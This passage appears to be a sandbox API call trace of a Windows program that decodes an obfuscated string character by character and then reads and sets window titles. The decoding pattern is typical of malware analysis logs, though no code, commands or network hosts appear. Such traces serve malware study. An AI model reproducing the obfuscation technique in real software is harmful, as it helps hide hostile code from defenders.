dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0086.809] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0086.809] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0086.810] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0086.810] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0086.810] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0086.811] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0086.811] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.811] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.812] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.812] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.812] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0086.813] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0086.813] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.813] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.814] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.836] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.836] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0086.836] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0086.837] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.837] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.837] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.838] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.838] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.839] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.839] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.839] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.839] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.840] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.840] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.841] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.841] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.841] GetForegroundWindow () returned 0x102c2 [0086.841] GetLastError () returned 0x0 [0086.841] SysStringLen (param_1=" ") returned 0xff [0086.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0086.842] SysStringLen (param_1=" ") returned 0xff [0086.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0xe577bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0086.842] GetWindowTextA (in: hWnd=0x102c2, lpString=0xe577bc, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0086.842] GetLastError () returned 0x0 [0086.842] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0086.842] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0xe3bb3c, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0086.842] SysStringLen (param_1="Act") returned 0x3 [0086.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Act", cchWideChar=4, lpMultiByteStr=0xe57084, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Act", lpUsedDefaultChar=0x0) returned 4 [0086.843] SetWindowTextA (hWnd=0x2036e, lpString="Act") returned 1 [0086.843] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0086.843] GetFocus () returned 0x0 [0086.843] lstrlenA (lpString="Act") returned 3 [0086.843] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xc, wParam=0x0, lParam=0xe57084) returned 0x1 [0086.843] IsWindow (hWnd=0x2036e) returned 1 [0086.843] IsWindow (hWnd=0x2036e) returned 1 [0086.844] IsWindow (hWnd=0x2036e) returned 1 [0086.844] IsWindow (hWnd=0x2036e) returned 1 [0086.844] GetFocus () returned 0x0 [0086.844] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0086.844] GetFocus () returned 0x0 [0086.844] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x4) returned 0x310bcd0 [0086.844] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd, wParam=0x4, lParam=0x310bcd0) returned 0x3 [0086.845] GetFocus () returned 0x0 [0086.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Act", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0086.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Act", cbMultiByte=-1, lpWideCharStr=0xe57084, cchWideChar=4 | out: lpWideCharStr="Act") returned 4 [0086.845] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcd0 | out: hHeap=0x30f0000) returned 1 [0086.845] VarCmp (pvarLeft=0x28f180, pvarRight=0x28f1e8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0086.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d", lpUsedDefaultChar=0x0) returned 1 [0086.846] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0086.846] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V", lpUsedDefaultChar=0x0) returned 1 [0086.846] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0086.847] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[", lpUsedDefaultChar=0x0) returned 1 [0086.847] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0086.847] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Q", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Q", lpUsedDefaultChar=0x0) returned 1 [0086.848] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="D", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="D") returned 1 [0086.848] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\", lpUsedDefaultChar=0x0) returned 1 [0086.849] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0086.849] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d", lpUsedDefaultChar=0x0) returned 1 [0086.849] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0086.850] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`", lpUsedDefaultChar=0x0) returned 1 [0086.850] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0086.850] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0086.851] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0086.851] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0086.852] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0086.852] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0086.852] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0086.852] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.853] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.853] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0086.854] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0086.854] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0086.854] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0086.855] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0086.855] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0086.855] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0086.856] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0086.856] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.856] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.857] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.857] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.857] 